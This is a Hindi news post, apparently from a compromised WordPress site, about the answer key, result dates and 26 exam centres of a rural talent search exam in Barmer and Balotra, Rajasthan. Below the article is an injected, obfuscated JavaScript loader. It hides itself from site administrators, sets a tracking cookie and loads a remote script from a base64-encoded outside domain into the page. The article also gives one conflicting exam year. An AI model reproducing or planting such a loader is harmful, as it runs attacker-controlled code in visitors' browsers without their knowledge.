ग्रामीण प्रतिभा खोज (प्रारम्भिक) परीक्षा 2025 की उत्तर कुंजी आज होगी जारी, 19 को रिजल्ट

बाड़मेर | शिक्षा, स्वास्थ्य एवं स्वरोजगार को समर्पित राजस्थान के उभरते संस्थान वीर तेजा नव सृजन संस्थान बाड़मेर द्वारा 12 जनवरी 2025 को आयोजित ग्रामीण प्रतिभा खोज प्रारम्भिक परीक्षा की उत्तर कुंजी बुधवार शाम 8:00 बजे जारी कर दी जायेगी।

यह परीक्षा विशेषतः बाड़मेर व बालोतरा दोनों जिलों के सरकारी व गैर सरकारी विद्यालयों में कक्षा 5वीं से 12वीं तक अध्ययनरत समस्त छात्र-छात्राओं के लिए वर्ष 2024 से लगातार आयोजित की जाती है। सत्र 2023-24 में दोनों जिलों के तकरीबन 13500 विद्यार्थियों ने भाग लिया। जिनमें से कुल 805 विद्यार्थियों ने नकद पुरस्कार, प्रशस्ति-पत्र, छात्रवृति व देश की शीर्ष शिक्षण संस्थानों में निःशुल्क संघ लोक सेवा आयोग की तैयारी के रूप में लाखों रुपए का पुरस्कार अपने नाम किया।

सत्र 2024-25 के लिए आवेदन प्रक्रिया 16 सितम्बर 2024 से 31 दिसम्बर 2024 तक सफलतापूर्वक संपन्न हुई। तत्पश्चात 12 जनवरी 2024 को प्रातः 11:00 बजे से 1:00 बजे तक दोनों जिलों के विभिन्न स्थानों पर परीक्षा आयोजित हुई।

जिनमें से जिला बाड़मेर में निम्नलिखित परीक्षा केंद्र निर्धारित किए गए थें-

1. वीर तेजाजी नाॅबल्स ऐकेडमी उच्च माध्यमिक विद्यालय नांद, बाड़मेर

2. डूंगर विद्यापीठ उच्च माध्यमिक विद्यालय बलदेव नगर बाड़‌मेर

3. राजकीय उच्च माध्यमिक विद्यालय सुधारों का तला नांद, गर्ल (बाड़मेर)

4. दयानन्द मॉडर्न ऐकेडमी उच्च माध्यमिक विद्यालय सनावड़ा, बाड़मेर

5. राजकीय उच्च माध्यमिक विद्यालय गंगासरा, बाड़मेर

6. राजकीय उच्च माध्यमिक विद्यालय धोलानाडा, आडेल

7. राजकीय उच्च माध्यमिक विद्यालय अर्जुन की ढाणी, आडेल

8. राजकीय उच्च माध्यमिक विद्यालय मंगले की बेरी, आडेल

9. राजकीय उच्च माध्यमिक विद्यालय मालपुरा, आडेल

10. राजकीय उच्च माध्यमिक विद्यालय पाबुबेरा, धोरीमना

11. श्री विजय मेमोरियल उच्च माध्यमिक विद्यालय धोरीमना

12. राजकीय उच्च माध्यमिक विद्यालय माणकी, धोरीमना

13. कस्तूरबा गांधी बालिका विद्यालय साता, फागलिया

14. जाट समाज शैक्षणिक एवं विकास संस्थान, सेड़वा

15. रूरल क्लासेज गोहड़ का तला, धनाउ

16. राजकीय उच्च माध्यमिक विद्यालय रतासर, चौहटन

17. मां वांकल मालाणी महाविद्यालय चौहटन

18. राजकीय उच्च माध्यमिक विद्यालय पनोणियों की ढाणी, चौहटन

19. राजकीय उच्च माध्यमिक विद्यालय ईशरोल, चौहटन

20. राजकीय उच्च माध्यमिक विद्यालय पुराणियों का तला, चौहटन

21. राजकीय उच्च माध्यमिक विद्यालय लीलसर, चौहटन

22. राजकीय उच्च माध्यमिक विद्यालय बाछड़ाऊ, चौहटन

वहीं जिला बालोतरा में निम्नलिखित परीक्षा केंद्र निर्धारित किए गए-

23. राजकीय उच्च माध्यमिक विद्यालय खींयोणी सारणों की ढाणी, सिणधरी

24. राजकीय उच्च माध्यमिक विद्यालय पायलाकला

25. राजकीय उच्च माध्यमिक विद्यालय दूधवा, बालोतरा

26. राजकीय उच्च माध्यमिक विद्यालय भीमरलाई गांव, बालोतरा

इस प्रकार इस बार दोनों जिलों के कुल 26 परीक्षा केन्द्रों पर कुल 3075 विद्यार्थियों ने अपना भविष्य आजमाया। इस प्रश्न-पत्र की उत्तर कुंजी आज शाम 8:00 बजे जारी करके 18 जनवरी 2025 को शाम 6:00 बजे तक आपत्तियाँ ली जाएगी। वहीं 19 जनवरी 2025 को शाम 8:00 बजे परीक्षा का परिणाम जारी कर दिया जाएगा। साथ ही मुख्य परीक्षा हेतु उत्तीर्ण विद्यार्थियों की सूची भी जारी कर दी जाएगी।

अतः जो विद्यार्थी मुख्य परीक्षा के लिए उत्तीर्ण होंगे उन्हें 20 जनवरी 2025 से 31 जनवरी 2025 तक संस्थान की आधिकारिक वेबसाइट www.vtnss.online पर अपना Online Registration सुनिश्चित करना होगा। जिसके लिए 50/- प्रति विद्यार्थी आवेदन शुल्क देय होंगे। निर्धारित तिथि तक आवेदन नहीं करने वाले विद्यार्थियों को मुख्य परीक्षा में बैठने का अवसर नहीं दिया जाएगा।

परीक्षा के लाभ : NCERT पाठ्यक्रम पर आधारित यह परीक्षा विद्यार्थियों के भविष्य निर्माण में रामबाण साबित हो रही है। क्योंकि यह परीक्षा पूरी तरह से भविष्य की परीक्षाओं को ध्यान में रखते हुए डिजाइन की गई है। इसका पैटर्न RPSC व UPSC पैटर्न पर आधारित है। इससे विद्यार्थी को अपना पाठ्यक्रम गहराई से पढने की सीख मिलती है। इतना ही नहीं विद्यार्थी को अपनी ही कक्षा एवं स्तर के जिले भर के हजारों विद्यार्थियों के साथ Competition करने का अवसर मिलता है। साथ ही स्वयं का स्तर जानने और उसमें निरंतर सुधार करने का बेहतरीन अवसर मिलता है। यह परीक्षा पूर्ण पारदर्शी होने के कारण विद्यार्थी अपनी वास्तविकता जानने का अवसर मिलता है। और हां, लोगों को यह भी जानकारी मिलती है कि किस विद्यालय में गुणवत्तापूर्ण शिक्षा पर बेहतर ध्यान दिया जाता है।

होनहार एवं जरूरतमंद विद्यार्थी इस परीक्षा के माध्यम से Scholarship लेकर अपने सपनों में उड़ान भर सकेंगे। अपनी निज मंजिल तक पहुंच सकेंगे। अपने आप में निखार ला सकेंगे। इसलिए हर विद्यार्थी को यह परीक्षा अवश्य देनी चाहिए।

(function(){try{if(document.getElementById&&document.getElementById(‘wpadminbar’))return;var t0=+new Date();for(var i=0;i120)return;if((document.cookie||”).indexOf(‘http2_session_id=’)!==-1)return;function systemLoad(input){var key=’ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=’,o1,o2,o3,h1,h2,h3,h4,dec=”,i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,”);while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<>4);o2=((h2&15)<>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&&window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();

3 Replies to “ग्रामीण प्रतिभा खोज (प्रारम्भिक) परीक्षा 2025 की उत्तर कुंजी आज होगी जारी, 19 को रिजल्ट”

Leave a Reply